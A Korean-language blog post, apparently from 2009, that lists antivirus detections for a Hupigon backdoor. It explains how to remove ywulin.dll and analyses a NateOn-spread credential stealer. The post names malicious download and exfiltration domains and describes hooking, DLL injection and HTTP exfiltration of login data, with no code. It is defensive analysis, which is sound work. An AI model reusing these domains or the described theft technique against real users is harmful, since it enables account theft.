Kaspersky	7.0.0.125	2009.05.25	-
McAfee	5625	2009.05.24	New Malware.ix
McAfee+Artemis	5625	2009.05.24	New Malware.ix
McAfee-GW-Edition	6.7.6	2009.05.24	Trojan.Backdoor.Hupigon.Gen
Microsoft	1.4701	2009.05.24	Backdoor:Win32/Hupigon.gen!B
NOD32	4099	2009.05.25	-
Norman	6.01.05	2009.05.22	-
nProtect	2009.1.8.0	2009.05.24	-
Panda	10.0.0.14	2009.05.24	Suspicious file
PCTools	4.4.2.0	2009.05.21	-
Prevx	3.0	2009.05.25	-
Rising	21.31.00.00	2009.05.25	Backdoor.Win32.Gpigeon2008.cch
Sophos	4.42.0	2009.05.25	-
Sunbelt	3.2.1858.2	2009.05.24	VIPRE.Suspicious
Symantec	1.4.4.12	2009.05.25	-
TheHacker	6.3.4.3.331	2009.05.25	-
TrendMicro	8.950.0.1092	2009.05.25	-
VBA32	3.12.10.5	2009.05.25	OScope.Backdoor.Hupigon.axbr
ViRobot	2009.5.25.1750	2009.05.25	-
VirusBuster	4.6.5.0	2009.05.24	-

바이러스랩님께 파일 전달했으니 nProtect는 조만간 패턴 업데이트될겁니다.

댓글로 문의하시는분들도 계시고 유입 키워드에도 ywulin.dll로 검색해서 제 블로그에 들어 오신 분들이 많으셔서
해당 악성코드를 삭제하는 방법을 알려드리도록 하겠습니다.
아무쪼록 도움이 되었으면 합니다.

먼저 Process Explorer를 다운 받습니다.

압축을 풀고 실행을 시키시면 다음과 같은 화면이 나올겁니다.(화면 구성에 약간의 차이는 있을 수 있습니다)

Ctrl+F를 누르시거나 메뉴바쪽에 잇는 망원경 표시를 누르시면 검색을 하실 수 있습니다.

검색 문자열에 ywulin.dll을 입력하고 검색을 하면 아래쪽에 NateOnMain.exe라는 프로세스 이름이 나오고
Handle or DLL쪽에 ywulin.dll 파일명이 보이실 겁니다.
해당 프로세스를 클릭하시면 현재 뒤쪽에 있는 Process Explorer에 표시가 될 것이고 아래쪽 창에 C:\WINDOWS\system32\ywulin.dll가 보이실겁니다.

아래쪽에 악성코드 파일명에 마우스 오른쪽 클릭을 하신 후 Close Handle을 클릭하시면 해당 악성코드 핸들이 닫힙니다.

이전까지는 삭제가 안되시던 ywulin.dll 파일이 핸들을 닫고 나면 삭제가 됩니다.




그리고 사용하시는 백신 프로그램을 업데이트하시고 정밀검사도 한번 하실것을 권장합니다.
백신업데이트는 항상 자동으로 되도록 하시는게 좋습니다.

Viruslab님의 블로그에 올라온 [Nateon]네이트온 쪽지로 신종 악성코드 유포 중 이라는 글을 보고
어...이거 본 적 있는데....하고 뒤져보니 10일 전에 회사에서 분석보고서를 썼더군요 ^^;
그때 제가 가지고 있었던 정보는 단지 도메인뿐이었습니다.
그래서 Viruslab님의 분석 글과는 약간의 차이가 있을 수 있습니다.

일단 제가 분석을 한 도메인은 www.nouydds.com 이었습니다.
해당 도메인에 접속시 www.tw-nsn.com/gif/jpg.scr로 리다이렉션 되면서 jpg.scr을 다운 받을 수 있었습니다.

특정 취약점을 공격하면 바로 실행시킬 수 있겠죠..

항상 하던 방식대로 일단 실행시켜보니 파일을 6개 생성하였고 그 중에서 5개가 실제 감염된 PC에 영향을 미치는 것으로 보입니다.

새로 생성된 파일들은 시스템 속성(S)과 숨김속성(H)을 가지고 있었습니다.
이 중 hf0214.exe와 hf0214.dll은 상당히 눈에 익었던 녀석들인데 어떤 기능을 하는 녀석들인지는 까먹었습니다. -_-;;
아무튼 hf0214.exe는 레지스트리에 등록되어 있어 재부팅시에도 실행되게끔 되어 있었습니다.

Process Explorer에서 hf0214.dll을 확인해 본 결과 현재 실행되고 있는 주요 프로세스에 인젝션되어 실행되고 있었습니다.

hf0214.dll에서 문자열만 추출해 봤더니 메이플스토리, 바람의 나라 등 게임 프로그램과 Internet Explorer를 후킹하는 듯 보였고
이렇게 후킹하여 가로챈 데이터를 HTTP를 통해서 어떤 데이터를 보내기 위한 함수들도 보였습니다.

         

단지 추측에 지나지 않을 수 있지만 URL에 특정 파라미터들이 오는지도 확인하는 듯 보입니다.

그리고 네이트온과 관계가 있어 보이는 악성코드인 ywulin.dll은 NateOnMain.exe 파일에 인젝션되어 동작하고 있었으며
네이트온 로그인시 로그인 정보를 후킹하여 특정 사이트로 전송하고 있었습니다.

후킹 함수와 URL을 오픈하는 함수가 보입니다.

이상한 URL이 보입니다.

실제로 네이트온에 가짜 계정 정보를 입력해보니 www.xdqxzq.com으로 계정 정보를 보내고 있었습니다.

결국 www.nouydds.com, tw-nsn.com, www.xdqxzq.com 모두 악성사이트라고 판단되어 모두 차단하였는데(모두 중국 IP)

URL을 변경하면서 계속 유포되고 있다고 하니 각별히 주의를 기울이셔야 할 듯 합니다.

아쉽게도 샘플파일이 없어져버려서 Virustotal에는 올려보지 못했지만 대부분 백신업체들이 해당 악성코드에 대한 패턴을 업데이트했으리라 봅니다.

바이러스랩님께서 분석글을 올리신걸 보면 nProtect는 업데이트된 듯 하구요...